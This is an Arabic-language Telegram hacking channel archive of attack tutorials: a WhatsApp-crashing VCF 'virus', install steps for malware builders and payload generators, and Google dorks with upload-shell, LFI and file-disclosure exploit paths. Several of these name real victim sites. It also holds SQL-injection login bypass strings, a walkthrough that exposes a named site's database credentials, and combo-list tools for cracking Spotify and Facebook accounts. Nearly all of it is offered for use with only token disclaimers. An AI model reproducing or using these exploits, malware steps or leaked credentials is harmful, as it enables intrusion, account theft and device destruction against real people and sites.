The Hacking Library
351 subscribers
874 photos
19 videos
44 files
1.3K links
محتوي القناه هو عباره عن تجميع
القناه عباره عن ارشيف للهكرز الأخلاقيات وغير الأخلاقيين
استمتعوا😀👍
Download Telegram
شرح اليوم هو عن اداة nikto لفحص المواقع من الثغرات والبورتات المفتوحة

اوامر تثبيتها

pkg update

pkg install git

pkg install perl

امر تنصيبها
git clone https://github.com/sullo/nikto

cd nikto

cd program

امر فتح الاداة
perl nikto.pl

امر فحص الموقع المطلوب

perl nikto.pl -h رابط الموقع

بعدها ننتظر حتى يكتمل من الفحص

#CS
#الدرس_التاسع

السلام عليكم ورحمة الله
راح اشرح لكم طريقه عمل فيروس (تعليق)  واتس اب
عن طريق تطبيق Quick Edit
هذا وظيفته انشاء فيروس واتس اب من نوع كونتكت   vcf


اولا نقوم بفتح التطبيق

نكتب على أول سطر BEGIN:VCARD
و ثاني سطر نحط ال version مثلا  VERSION:3.0
أما ثالث سطر والرابع نضع الاسم النحنا بدنا ياه
N: الذيب يقتحم  »👹PC👹«الذيب يقتحم
NF:الذيب يقتحم  »👹PC👹«الذيب يقتحم

أما في الأسطر الباقيه راح نكرر هذا الي 600 وكل ما زاد عدد الأسطر زادت قوة الفايروس
TEL:+92 301 0880725
TEL;type=HOME;waid=923012762840:+92 301 2762840
TEL:+92 301 3473800
item1.TEL:+92 301 0515416
item1.X-ABLabel:OTHER
TEL:+92 301 0621125
TEL;type=HOME:+92 301 0346216
TEL;type=HOME:+92 301 0510516
item2.TEL;waid=923016460306:+92 301 6460306
item2.X-ABLabel:OTHER
item3.TEL:+92 301 1848084
item3.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3577574
item4.TEL:+92 301 0286016
item4.X-ABLabel:OTHER
TEL:+92 301 5005627
TEL:+92 301 7845010
TEL;waid=923012841806:+92 301 2841806
TEL:+92 301 1684307
TEL;type=HOME;waid=923012827570:+92 301 2827570
item5.TEL:+92 301 7701532
item5.X-ABLabel:OTHER
TEL:+92 301 7186236
TEL:+92 301 5421638
item6.TEL:+92 301 3314888
item6.X-ABLabel:OTHER
TEL;waid=923018442044:+92 301 8442044
TEL;type=HOME:+92 301 4550300
TEL:+92 301 0788813
TEL;waid=923012814480:+92 301 2814480
TEL:+92 301 1285410
TEL;type=HOME:+92 301 2732023
TEL;type=HOME:+92 301 8754235
TEL:+92 301 0503015
item7.TEL:+92 301 8330677
item7.X-ABLabel:OTHER
item8.TEL:+92 301 6217127
item8.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3264214
TEL:+92 301 5654084
TEL;type=HOME;waid=923016022458:+92 301 6022458
TEL;type=HOME:+92 301 5626232
item9.TEL:+92 301 1738823
item9.X-ABLabel:OTHER
TEL;type=HOME:+92 301 5726156
TEL:+92 301 8768875




شرح مقدم من
#CS
#الدرس_العاشر

السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater


 طريقه تثبيتها:::-


الاوامر

1-  git clone https://github.com/ERROR4317/viruscreater

2-  cd viruscreater

أمر التشغيل


3- python2 virus.py



انا اخترت رقم 2

صناعه فيروسات قويه و ب انواع مختلفه



#CS
#الدرس_12
تم تحديث اداه payload5

هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help

للتحديث قم بكتابه 99

تثبيت اداة Payload 5

pkg install git -y

git clone https://github.com/Ali898989/setupp

cd setupp

chmod +x setup.sh

./setup.sh


cd payload5


#CS
#الدرس_13
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
 بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض


الشرح مقدم من
#CS
الدورك

inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html



مثال موقع

http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php



#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php

============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif

#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
 ثغرة Local File Include

بسم الله الرحمن الرحيم
اخواني الكرام 
السلام عليكم و رحمة الله وبركاته 
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=index  


طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!! 
والمراد من فك التشفير هو الحصول على ملف الكونيفق 
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=config_inc  

الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة 
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom


#CS
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:

# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png

# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png

# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png

# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png

#################################################
# Telegram: @ArkealoGeNDz
#################################################
الثغرة
 Local File Disclosure in wordpress theme Diarise


الدورك
 inurl:"wp-content/themes/diarise/"

الاستغلال

http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

#CS
الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs
 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS
السلام عليكم ورحمة الله وبركاته

شرقي اليوم كيفيه  تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
  سهل جداا
سنتحتاج الي اداتين هما 
الاتشكر والكومبو البريفيت
 
اولا قم بفتح termux  

اولا علينا تثبيت أداة الكومبو وظيفتها  استخراج  كومبو من التيرمكس

اوامرها
 

pkg install php git -y



git clone https://github.com/Juni0r007/PasTerm.git



cd PasTerm

chmod +x *

php pasterm.php

راح تفتح معك الأداة

و بعدها
راح يطلب لك تكتب key word راح تنسخ
 الموجود بالأسفل و تلصقه علي termux

 
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com


و بعدها راح يقول لك اكتب اسم لهذة اللسته
  انا كتبت saja

و بعدها راح يطلع لك مسار التم الاحتفاظ به

مثل هذا

/data/data/com.termux/files/home/saja.txt


كذا انتهينا من الأداة الاولي و تم استخراج للسته
 قويه من والكومبو


راح بندا الجزء الثاني و هو  تثبيت اداة اتشكر الاكونتات

 نفتح صفحه جديدة و نكتب الأوامر التاليه


 
1- rm -rif  PasTerm
apt update&&apt upgrade -y

2-termux-setup-storage

3- pkg install php git -y


4- git clone https://github.com/Juni0r007/AIOChk.git


5- ls


6- cd AIOChk


7- chmod +x *


8- php aio.php



و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد

راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا

/data/data/com.termux/files/home/saja.txt

 و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها

استمتعوووو

(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)


#CS
# اسم الثغرة : Joomla com_admin Components from V2.5.4 to V3.7.4
Database Backup Arbitrary File Download Vulnerability



# الدورك
   inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة   متوسطة
#################################################################################################

# مسار لوحه التحكم :

/administrator

#################################################################################################

# الاستغلالات  :



/joomla/administrator/components/com_admin/sql/others/mysql/......

/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......

/PATH/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/postgresql/.......

/administrator/components/com_admin/sql/updates/sqlazure/......

/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql

/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql

/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql

#################################################################################################

# أمثلة لمواقع مصابة  =>

[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql

[+]



#CS
الاسم : SO-AT Solution CMS Bypass SQL Login


الدورك  inurl:/coop/re_register.php


الاستغلال


/coop/adminlogon.php



User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+



أمثلة

 http://healthcoop.or.th/coop/adminlogon.php



 http://www.tot-coop.com/coop/adminlogon.php



#CS
الاسم    Server Info

الدورك

inurl:"debug/default/view?panel=config"


راح تطلع لك مواقع كثيرة

مجرد ما تدخل لها راح يعطيك معلومات
وايضا اسم المستخدم وكلمة المرور

#CS
ثغرة  (FTP2FTP ( Arbitrary File Download :
الدورك  
: inurl:/download2.php?id=

الاستغلال


http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

مثال


http://www.supersat.cz/download/azbox/download2.php?id=23

after exploit :

http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================



#CS